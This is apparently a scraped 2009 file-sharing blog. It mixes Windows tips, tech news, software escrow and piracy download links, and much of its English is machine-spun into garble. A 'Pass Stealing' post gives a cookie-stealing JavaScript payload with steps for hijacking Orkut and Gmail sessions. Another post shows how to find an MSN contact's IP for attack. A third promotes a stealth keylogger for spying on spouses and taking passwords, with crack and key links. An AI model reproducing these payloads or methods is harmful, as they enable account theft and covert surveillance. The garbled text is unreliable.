2. Optimize your RAM. To abuse this one we apprehend actual often. And all of the accoutrement that action this abuse to accord the aftereffect that we do not apprehend that the achievement of our computers become added severe. Windows is basically a book that food generally use in RAM. Thus, the book can be accessed actual quickly. If you apple-pie the RAM agency that the book will be accessed afresh from the harder drive takes abundant best if compared with admission from the RAM. In addition, deejay admission is too generally can become a accountability which makes automated apparatus will be damaged quickly.
3. Clearing the Prefetch. With the advice of prefetch function, Windows will optimize the cossack process. For that he charge to save the book to the prefetch folder. If you annul these files, Windows accept to actualize it afresh so that the booting action a little longer.
4. Cossack off the logo. Generally we apprehend the assessment that by abacus the constant '/ noguiboot' in the book 'boot.ini', booting Windows can added bound because it does not charge to affectation the logo if booting. This is in actuality not actual able because the Windows book in alongside to yield not one by one. Bilapun accept differences alone be affected in a amount nanodetik.
5. Shut off account QoS (Quality of Service). Tips for axis off the account QoS is still alone have. It is said there that Windows provides about 20% of the bandwidth accessible to this service. In actuality back abounding years ago, Microsoft has been angry the lie to this.
Only 5 guidelines that can advice us to advance and optimize your Windows computer in our lewak abuse apparatus offered. With the fifth guideline is accepted memilah we can abuse any of that absolutely accord optimal achievement and are alone aggravate the achievement of our computers, from the abounding that there is a abuse in one amalgamation abuse tool.
Microsoft prepared Browser Gazelle
just4share, Tuesday, March 10, 2009
In the middle of the competition browser the internet that increasingly heated up, the scientists Microsoft tried to vibrate the innovation browser just that was named Gazelle. Gazelle was promised will have fitur-fitur impressive. Browser this also was said safest from the bad program threat if compared with browser that was other. Quoted detikINET from Vnunet, on Tuesday (24/2/2009), Microsoft claimed that browser this had the development of the level of the significant security if compared with browser other including the Explorer Internet (IE) or Firefox. "Not there is browser including that berarsitektur just had the construction" of the "operation system multi the" Principal "that made browser had the exclusive control to protect all the systems," explained Microsoft about Gazelle. Gazelle could it was claimed determine the traffic cleverly and directly reacted in the bad program threat. At this time, browser this still was in the prototype stage and did not yet have the plan from Microsoft to launch him.
source: detiknet
Pass Stealing
just4share, Monday, March 9, 2009Hacking orkut or Gmail" With the Advice of Accolade or by "stealing accolade of the victim
By traveling through this column i achievement you will accept how simple has ha*king become with the advice of cookies.
By this column you'll be acquirements cookie burglary and H*cking orkut Or Gmail account.
Procedure to h*ck gmail or orkut through mozilla by burglary cookies:-
1.Firstly you charge accept Mozilla firefox
2.Download cookie editor plugin for Mozilla firefox
3.You charge to accept two affected accounts to Hac* Orkut or Gmail , So that you accept to accept accolade to one Orkut annual and added Orkut annual for Advertising your Script, Well it depends on your Choice to accept Two Gmail(Orkut) accounts
Cookie Script:
java script:nobody=replyForm;nobody.toUserId.value=3344 4211;
nobody.scrapText.value=document.cookie;nobody.acti on='scrapbook.aspx?
Action.submit';nobody.submit()
How to use accolade script?
1. Alter your amount "UserId.value=33444211"
How to Alter your Number
1. Go to your album
2. Right bang on any Photo> Properties>55886645.jpg It will be a Eight Chiffre Value.
3. Now alter your amount with the amount in the java script
now
Your Software will attending like
java script:nobody=replyForm;nobody.toUserId.value=your number;
nobody.scrapText.value=eval(String.fromCharCode(10 0,111,99,117,109,101,110,116,4
6,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBas ic';nobody.submit()
2.Now forward this Cookie Software to the victim and ask him to adhesive in Adress bar and Press enter
3.You'll Get his cookie in your atom book
4.After Getting a cookie go to your orkut Home page , Afresh clik on Tools tab and afresh go to cookie editor plugin( Tools--> Cookie editor)
5.click filter/refresh.look for 'orkut_state' cookie. just bifold bang it and alter the orkut_state allotment with your victim's Script
put ur eight chiffre amount in the abode of (33444211)
Thats it your done With.
Logout of your orkut and login afresh and you'll be in your victims Homepage.
Posted by Ali Hayder at 3:20 AM
Hac*ing MSN
H*cking MSN
a baby ambush ll formed for me appropriately announcement it here
Ha*king MSN is in fact VERY simple. Msn is advised to avenue the affiliation through a microsoft server while you are chatting. However, if a book is sent, a DCC (direct connection) is created. This was advisedly done because contrarily microsoft would decay alot of bandwidth so a absolute affiliation is made. This is your chance. Make a book alteration action amid u and a victim (try to forward a big file), accessible up your command alert (run "cmd" in NT/XP or "command" in 9X to get into prompt) and run netstat. usually the MSN targets IP would be aloft anchorage 2000. enjoy.
If u recieve some applesauce like gux1-43.primus.com as the target, do a about-face DNS lookup on it. However, this occurs actual rarely, mostly u will recieve a bright IP.
once u accept d IP u can do annihilation with him by Fingerprinting.
U can assure yourself from this occurring to you by application a proxy with MSN (under access console in options).
software escrow
just4share, Thursday, March 5, 2009I was alignment for some a custom software amalgamation to be accounting for my organization, and anyone asked if I'd abiding for "software escrow". What is that, and why would I wish it?
Getting anyone to address software for you can aftereffect in a wonderful, custom band-aid to your problem. It can aswell acquire a cogent bulk of accident if things go wrong.
Software escrow is one way of attention you in assertive types of projects if assertive things go wrong.
When you arrangement out for software to be accounting for you, there are several decisions that are allotment of the process. One that's generally disregarded is whether or not you get a archetype of the antecedent cipher if the activity is done.
The antecedent cipher is the accumulating of accounting instructions that the programmer in fact writes to actualize a program. For abounding types of programs, the antecedent cipher is again adapted into the "executable" that you in fact run. For archetype "notepad.exe" is a executable affairs that comes with Windows. Somewhere aback at Microsoft they accumulate the accounting instructions, or antecedent code, that the programmers acclimated to actualize it.
Open antecedent software projects accomplish the antecedent cipher about accessible. Anyone with abundant ability can actualize the software executable application the antecedent code. Closed source, or "proprietary" software is just the adverse ... the antecedent cipher is not accessible publicly, alone the executable. Companies use this admission to absorb their bookish property, and barter secrets.
When you arrangement with anyone to address software for you one decision, adumbrated or explicit, is whether the antecedent cipher belongs alone to the developer, or whether you get a copy. If you do, you accept the assurance of getting able to accept anyone abroad accomplish changes or fix bugs in the future, but the developer is giving up some of his or her abeyant ascendancy of that software. If the developer retains the antecedent cipher and you don't accept admission to it, again you are barnacle on the developer for all approaching updates. About developers will allegation added if you get the antecedent code.
It's accepted to opt for the cheaper option, or to accept the developer artlessly not accord you the option.
So what happens if your developer goes out of business? What if all of the antecedent cipher artlessly disappears?
That's area software or antecedent cipher escrow comes into play.
As allotment of alignment for your software to be written, you and the developer can accede that a archetype of the antecedent cipher will be accustomed to a aloof third affair - an escrow agent. The acceding would again specify beneath which altitude that abettor would be accustomed to absolution the antecedent cipher to you. For archetype one of the altitude ability be the developer's defalcation or traveling out of business for added reasons. By application software escrow, the developer is adequate as continued as it makes faculty for them to absorb control, and you are adequate should the developer disappear. (Naturally added altitude ability activate the release, but the developer's traveling out of business is a bright example.)
Software escrow is not fool proof. For example, what happens if the escrow abettor goes away? And escrow about adds some amount to your transaction.
But I anticipate of it as an allowance policy.
Yahoo Domain
just4share, Wednesday, March 4, 2009What is a Yahoo domain?
The well-known portal Yahoo! the domain name business. The company offers domain name registration through Yahoo! Small Business Division. This sector of Yahoo is for entrepreneurs to help their businesses by providing support, such as the hiring of services, marketing tools and web hosting. The next step is useful to mark the Yahoo domain registration. It is a tool that helps companies online presence.
PC Magazine reviewed Yahoo domains, and gave the coveted Editor's Choice Award. The published review states that "Domain registration through Yahoo! Small Business is the easiest." This statement reflects the level of services they receive, through a Yahoo domain. It offers many features such as domain forwarding, email forwarding, control panel with DNS management, and the most popular top-level domains. Knowledgeable customer service is twenty-four hours a day, seven days a week and the call is free. Besides this, one to five years registration plans are available.
Yahoo! Areas of modernization is simply for those who prefer other Yahoo! Services. Customers can upgrade to a customized personal mailbox or business mail package, with the domain name. The user can also Yahoo! Domain from another webhost in Yahoo! Web Hosting. If the customer needs help in creating an online store, they can call on the help of Merchant Solutions is a program that helps them manage online sales.
PC Magazine said that a Yahoo-domain is the easiest. It is perfectly possible to argue that the service is one of the cheapest. It offers all of the above features for only $ 4.98 per year, at the time of writing this article. With so many great features in such a low price, it is difficult to get an offer like this.
Unlock Huawei C2801
just4share, Saturday, February 28, 2009To open a lock provider of the mobile phone Huawei C2801 needed some kind of tool, why? because in the huawei c2801 mobile phone there are many different versions. On the mobile version of this level, indicate that the security provider's version it self.To know what versions on huawei c2801 mobile phone is very easy, first on the standby menu press: menu> settings> phone settings> Version, scroll down to see any posts "Jan 01 2008" or " mar 05 2008 "which shows the date that is the version of the mobile phone, that's easy way.
Initial steps that need to prepare for the unlock Huawei C2801 is a link between media huawei mobile phone and PC, including "data cable" and "software" to unlock itself.to create a data cable needed to unlock Huawei, steps can be viewed in HERE.
Software that is in need:
1.DXDIAG, DOWNLOAD HERE!!
2.Firmware diag with extensions "DSC" for Huawei c2801 version "12_Nov_2007", "08_Des_2007", "22_Des_2007," and "02_Jan_2008", DOWNLOAD HERE!!
3.Firmware diag with extensions "DSC" for Huawei c2801 version "5_mar_2008" , DOWNLOAD HERE!!
OK in the material need to unlock Huawei already have, only how to use the software, which we will study further in the next article ^^.
Regards, iatngicu
Power Spy 8.11
just4share, Tuesday, February 24, 2009
Computer spy software / monitoring software by eMatrixSoft, Power Spy - Invisible keylogger, email and messenger spy software.
Perfect for catching cheaters, monitoring employees, children and spouse, acquiring others' passwords, chat records and websites visited, and even investigating crimes.
Power Spy software lets you know EXACTLY what others do on your PC while you are away. It allow you to secretly monitor and record all activities on your computer, and this is completely legal. Such monitoring acts so stealthily that the user won't know its existence.
It records all keystrokes typed, all chats and instant messages in MSN Messenger, Windows Live Messenger, ICQ, AOL Messenger, AIM, Yahoo! Messenger, Windows Messenger and Skype. It records websites visited, emails read, clipboard activaties, passwords typed, documents opened, windows opened and applications executed . Power Spy software even takes screen snapshots at your set interval like a surveillance camera. It displays exact activities, like MySpace, Facebook, computer games, internet searches, online shopping, file transfers, web-based emails like Hotmail, AOL email, Gmail, Yahoo mail and hundreds of others.
In Stealth Mode, it is completely invisible to computer users. However, it is easy for you to unhide its main program Control Panel with your hotkey, view the record secretly from the CP on the monitored computer directly, or receive log reports via your custom email or ftp server! These reports can be sent as often as you wish, such as every sixty minutes (ajustable). The software can be password protected to prevent others from terminating or uninstalling it.
app : download here
fix patch : download here
reg key : download here
Iolo Search and Recover 5
just4share, Sunday, February 22, 2009
Rescues critical work and cherished memories you thought were gone forever
Accidentally deleted photos, files, songs, email or videos, lost even years ago, can be safely recovered with a single click.
Using the wrong recovery software can damage data, reducing your chances of success.
Search and Recover's powerful technology rescues items other products miss.
Search and Recover rescues data from any drive
or device
* Recovers from all digital media and devices: cameras, music players, CDs, DVDs, memory cards, flash drives and more
* Recovers from all drive types: IDE, SCSI, USB, USB 2.0, FireWire and others
* Recovers from all popular e-mail programs: Outlook, Outlook Express, Thunderbird, Netscape Mail and Eudora
* Even recovers data from malfunctioning, damaged, formatted, and repartitioned drives and devices!
Turn frustration to triumph in seconds!
Intuitive
Step-by-step wizards and one-click operations make data recovery fast and easy.
Convenient TotalRecovery™
Point to a folder, device, drive, or CD-DVD to recover all deleted data with a single click.
Smart
SmartScan™ technology automatically finds lost data so you can get back to work immediately.
Powerful
Exclusive StrongScan feature finds more deleted data than other products, even years after deletion.
download here!!!
Genuine License Here!!!
Plugin Photosop (FocalPoint 1 - Full Version Price)
just4share, Sunday, February 15, 2009
The use of selective focus has been part of photography since the very first lenses where invented. There are many techniques used to control either the plane of focus or removing sharpness from edges.
The most common way to do this is by controlling depth of field in the camera by using a large aperture lens producing a narrow depth of field. Now photographers have a new Photoshop plug-in to help put the focus where they want — the all new FocalPoint 1.0.
OnOne_FocalPoint.1.0.rar (Size: 95418 KB).
Photoshop Creative Magazine Reuploaded [12 Issues]
just4share, Saturday, February 14, 2009Our aim is to provide you with the best possible resources to help you develop your skills. We know just as well as you do that Photoshop's capabilities can seem never-ending at times, which is why we're here to demystify the program and teach you how to use it in a way that suits you. Acting as the backbone of the magazine are the tutorials, which are designed to help you explore new tools and develop new skills. Each tutorial is given a grade - Beginner, Intermediate or Expert - enabling you to learn at your own pace.
Whether you're after information on specific tools and functionality, or you want to learn specialised techniques, we've got it covered. We pride ourselves in striking a balance between technical and creative tutorials, ensuring you develop a really good understanding of Photoshop from all angles. Our Big Technique section is specially designed to teach you the ins and outs of specific tools or methods such as Adjustment Layers and Actions. As well as stocking up on practical advice and getting stuck into fun projects, you can also enjoy our in-depth features. These cover all sorts of interesting topics, such as how to compile the perfect portfolio or fake the weather using nothing but Photoshop.
Who says learning has to be boring? The main emphasis of this magazine is on fun, and we're here to make your Photoshop experience as rewarding and enjoyable as possible.
Here at Photoshop Creative we always love to see how our readers are getting on, so be sure to show us your latest Photoshop projects. We look forward to hearing from you!
http://rapidshare.com/files/87334442/akhareshe_Photoshop_Creative_Mag.part1.rar
http://rapidshare.com/files/87362906/akhareshe_Photoshop_Creative_Mag.part2.rar
http://rapidshare.com/files/87361580/akhareshe_Photoshop_Creative_Mag.part3.rar
The Handsome Set : All your Favorite Forums without Banner -- Firefox Only!
just4share,The Handsome Set is a set of filters that can be in-subscribe, to remove the banners, ads, etc. from yours favourite Site .
How it:
1. First, install the AdBlock Plus extension (not only AdBlock; a "Plus" it)
AdBlock Plus can be obtained here https://addons.mozilla.org/firefox/addon/1865
2. Click the triangle button right next to the ABP
3. Select "Preferences"
4. Select the menu is: Filters> Add Filter Subscription
5. Subscription Title: The Handsome Set
6. Location List Filter.http://pandu.poluan.info/handsome_set.txt
7. Check "Update automatically"
8. Check "Enable filters"
9. Click OK
10. Click Apply
11. Click OK.
Enjoy your's Browsing.
sotosop plugin,shape,brush,etc
just4share,
Many kind of sotosop plugin,shape,brush,etc , all direct link. So get download all for free
Just for share, enjoy this link
http://tg.griffsgraphix.com/Programs/
PhotoTools 1 Professional Edition - Full Version
just4share,
Whether you are new to photography and have never experienced the darkroom or you are an experienced pro who has mastered photography you will appreciate the range of authentic camera, filter and darkroom techniques reproduced with PhotoTools 1.0 Professional Edition. PhotoTools 1.0 Professional Edition contains 250 effects by Jack Davis, Kevin Kubota and onOne Software that faithfully reproduce camera filters like neutral density, color correction and polarization as well as darkroom techniques and alternative processes like solarization, cyanotype and more. You can even simulate the look of different films with the a wide range of grain and contrast effects.
The key to PhotoTools 1.0 Professional Edition is its unique ability to provide full-screen previews of an effect on your image before you choose to apply it. But it isn’t just a single effect, you can stack multiple effects on top of each other just like you would camera filters. You can control the order of each effect and how they blend together for a truly unique look. You can even save your effect stacks so you can repeat them easily and even share them with your friends you have PhotoTools.
PhotoTools 1.0 Professional Editions Feature:
* Preview Photoshop action effects before applying to original
* Combine multiple effects together in a layered stack
* Adjust the strength or opacity for each layer in a stack
* Save layer stacks as presets for future use
* Batch process effects on multiple photos
* Apply effect with a layer mask for additional editing
* Base set of 150 effects from onOne and Jack Davis
* Additional 50 effects from Jack Davis
* Additional 50 effects from Kevin Kubota
OnOne_Photo_Tools_1.0_3.rar (Size: 50217 KB)
http://rapidshare.com/files/176022310/OOS-PhotoTools-V1.0.3-ProFP.rar
Windows XP Secret Application
just4share, Friday, February 13, 2009To Run this application :
Klik Start -> Run and write names its ( example :cleanmgrexe broker)
1. cleanmgr.exe Cleanup discs
Used to Cleanup discs
2. charMap.exe
Used to find the Character does not general
3.Dr Watson = Drwtsn32.exe
Used to troubleshooting in the momentonly
4.DirectX diagnosis = dxdiag.exe
Used to diagnosis audiotape was aired video card you
5 .to be observed = eudcedit.exe Private Character
Used to make the Character of new Windows you
6.The Wizards = IExpress.exe IExpress 6
Used to make self-extracting / self-installing package like File Zip
7. Microsoft Synchronization Manager = mobsync.exe
Used to make sincronisasi
8.Clipboard Viewer = clipbrd.exe
Used to see konten from Windows Clipboard
9.Media named 51 = mplay32.exe
Used to the Media named the Windows version of 51
10.ODBC Source Administrator = ODBCad32.exe
Used for a Data
11.Object Packager = Packager.exe
Used to bring to File targets
12.System Configuration be observed = sysedit.exe
Used to change Systemini and winini
13.Syskey = Syskey.exe
Used to konfigurasi account in Windows
14.Microsoft Telnet Client = Telnet.exe
Used to koneksi the internet before there browser
15.Drivers' Verifier Manager = Verifier.exe
Used to Monitoring the Drivers' in Windows you
16.Windows for Workgroups Chat = winChat.exe
Used to Chat sec
17.System Configuration = msconfig.exe
Used to Control Startup Program
18.System Monitor = perfmon.exe
Used to Monitor the momentonly you
19.The Program Manager = progman.exe
Was tense from Windows 3x desktop shell
20.Gpeditmsc
Used to regulate group policy and otorisasi that you use Directory.Active
21.Remote Access phone book = rasphone.exe
Aplikasi as a book telephone
22.Registry be observed = regedt32.exe or regedit.exe
Used to tweaking and editing Registry Windows
23.Network shared folder the Wizards = shrpubw.exe
Used to make shared folder in Network
24.File siganture verification tool = sigverif.exe
Used for verification committee signature
25.The = sndvol32.exe smoke-related
Used to sound smoke-related in Tray System